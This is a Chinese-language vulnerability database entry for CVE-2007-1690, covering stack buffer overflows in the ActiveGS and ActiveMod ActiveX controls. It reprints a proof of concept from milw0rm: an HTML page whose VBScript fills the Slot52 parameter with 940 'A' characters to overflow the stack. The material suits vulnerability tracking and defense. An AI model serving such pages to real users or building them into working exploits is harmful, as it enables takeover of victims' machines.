Second Sight Software多个ActiveX控件栈缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112786 漏洞类型 缓冲区溢出
发布时间 2007-04-24 更新时间 2007-04-24
CVE编号 CVE-2007-1690 CNNVD-ID CNNVD-200704-382
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3788
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-382
|漏洞详情
ActiveGS和ActiveMod都是SecondSightSoftware提供的ActiveX控件,分别用于模拟AppleIIGS和播放音乐。ActiveGS和ActiveMod控件实现上存在栈缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。如果用户受骗浏览了恶意的HTML文档的话,就可能触发这些控件中的栈溢出,导致执行任意指令。
|漏洞EXP
<!--

  ===============================================================================================
                        Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC
                                            By Umesh Wanve 
  ==============================================================================================   
        
  Date : 24-04-2007
 
  Tested on Windows 2000 SP4 Server English
            Windows 2000 SP4 Professional English
   
  Reference: http://www.securityfocus.com/bid/23554

  Vendor: http://www.freetoolsassociation.com
          http://www.freetoolsassociation.com/fta/activegs/activegs.cab 

 
  Desc: Many parameters of CLSID 052DF14F-6F28-44A0-9130-294FDA6176EB are vulnerable. This activex gives error like,
      Buffer Overrun detected. This is complied with /GS flag. The all vulnerable parameters are 
       Slot51,Slot52,Slot61,Slot62,Slot7,Slot71,Slot72.

  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Always thanks to Metasploit and Stroke.

-->


<html>

<title>
 Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC- By Umesh Wanve
</title>

<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:052DF14F-6F28-44A0-9130-294FDA6176EB" > </OBJECT>

<script language="vbscript">
targetFile = "C:\Research\activegs\ActiveGS.ocx"
prototype  = "Invoke_Unknown Slot52 As String"
memberName = "Slot52"
progid     = "ActiveGSLib.ActiveGS"
argCount   = 1

arg1=String(940, "A")

target.Slot52 = arg1


</script>

</body>

</html>

# milw0rm.com [2007-04-24]
|参考资料

来源:VU#118737
名称:VU#118737
链接:http://www.kb.cert.org/vuls/id/118737
来源:OSVDB
名称:34326
链接:http://osvdb.org/34326
来源:XF
名称:activegs-slot-bo(33759)
链接:http://xforce.iss.net/xforce/xfdb/33759
来源:BID
名称:23554
链接:http://www.securityfocus.com/bid/23554
来源:VUPEN
名称:ADV-2007-1454
链接:http://www.frsirt.com/english/advisories/2007/1454
来源:SECUNIA
名称:24960
链接:http://secunia.com/advisories/24960